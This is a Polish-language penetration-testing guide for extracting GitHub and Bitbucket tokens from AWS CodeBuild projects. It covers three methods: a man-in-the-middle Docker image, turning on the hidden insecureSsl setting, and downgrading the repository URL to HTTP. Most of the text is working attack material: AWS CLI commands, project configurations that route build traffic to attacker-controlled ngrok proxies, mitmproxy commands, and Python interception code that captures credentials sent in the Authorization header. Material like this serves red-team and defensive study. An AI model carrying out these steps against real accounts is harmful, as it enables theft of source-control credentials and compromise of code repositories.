AWS Codebuild - Token Leakage

Recover Github/Bitbucket Configured Tokens

Najpierw sprawdź, czy są skonfigurowane jakiekolwiek poświadczenia źródłowe, które możesz wyciekować:

aws codebuild list-source-credentials

Via Docker Image

Jeśli stwierdzisz, że uwierzytelnienie do na przykład Github jest ustawione w koncie, możesz ekstrahować ten dostęp (token GH lub token OAuth) poprzez sprawienie, że Codebuild użyje konkretnego obrazu docker do uruchomienia budowy projektu.

W tym celu możesz utworzyć nowy projekt Codebuild lub zmienić środowisko istniejącego, aby ustawić obraz Docker.

Obraz Docker, którego możesz użyć, to https://github.com/carlospolop/docker-mitm. To bardzo podstawowy obraz Docker, który ustawi zmienne środowiskowe https_proxy, http_proxy i SSL_CERT_FILE. To pozwoli ci przechwycić większość ruchu hosta wskazanego w https_proxy i http_proxy oraz zaufać certyfikatowi SSL wskazanemu w SSL_CERT_FILE.

1. Utwórz i prześlij swój własny obraz Docker MitM

• Postępuj zgodnie z instrukcjami repozytorium, aby ustawić swój adres IP proxy i ustawić swój certyfikat SSL oraz zbudować obraz docker.

• NIE USTAWIAJ http_proxy, aby nie przechwytywać żądań do punktu końcowego metadanych.

• Możesz użyć ngrok jak ngrok tcp 4444, aby ustawić proxy do swojego hosta.

• Gdy masz zbudowany obraz Docker, prześlij go do publicznego repozytorium (Dockerhub, ECR...)

1. Ustaw środowisko

• Utwórz nowy projekt Codebuild lub zmodyfikuj środowisko istniejącego.

• Ustaw projekt, aby używał wcześniej wygenerowanego obrazu Docker.

1. Ustaw proxy MitM w swoim hoście

• Jak wskazano w repozytorium Github, możesz użyć czegoś takiego:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

1. Uruchom budowę i przechwyć poświadczenia

• Możesz zobaczyć token w nagłówku Authorization:

Można to również zrobić z aws cli za pomocą czegoś takiego

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Via insecureSSL

Codebuild projekty mają ustawienie zwane insecureSsl, które jest ukryte w sieci, można je zmienić tylko z poziomu API. Włączenie tego pozwala Codebuild połączyć się z repozytorium bez sprawdzania certyfikatu oferowanego przez platformę.

• Najpierw musisz enumerować bieżącą konfigurację za pomocą czegoś takiego:

aws codebuild batch-get-projects --name <proj-name>

• Następnie, z zebranymi informacjami możesz zaktualizować ustawienie projektu insecureSsl na True. Poniżej znajduje się przykład mojej aktualizacji projektu, zwróć uwagę na insecureSsl=True na końcu (to jest jedyna rzecz, którą musisz zmienić w zebranej konfiguracji).

• Ponadto, dodaj również zmienne środowiskowe http_proxy i https_proxy wskazujące na twój tcp ngrok, jak:

aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "https://2.tcp.eu.ngrok.io:15027"
}
]
}'

• Następnie uruchom podstawowy przykład z https://github.com/synchronizing/mitm na porcie wskazanym przez zmienne proxy (http_proxy i https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Na koniec kliknij na Zbuduj projekt, poświadczenia będą wysyłane w czystym tekście (base64) do portu mitm:

Via HTTP protocol

Atakujący z podwyższonymi uprawnieniami w CodeBuild mógłby wyciekować token Github/Bitbucket skonfigurowany lub jeśli uprawnienia były skonfigurowane za pomocą OAuth, tymczasowy token OAuth używany do uzyskania dostępu do kodu.

• Atakujący mógłby dodać zmienne środowiskowe http_proxy i https_proxy do projektu CodeBuild wskazujące na jego maszynę (na przykład http://5.tcp.eu.ngrok.io:14972).

• Następnie zmień URL repozytorium github na używający HTTP zamiast HTTPS, na przykład: http://github.com/carlospolop-forks/TestActions

• Następnie uruchom podstawowy przykład z https://github.com/synchronizing/mitm na porcie wskazanym przez zmienne proxy (http_proxy i https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Na koniec kliknij na Zbuduj projekt, poświadczenia zostaną wysłane w czystym tekście (base64) do portu mitm: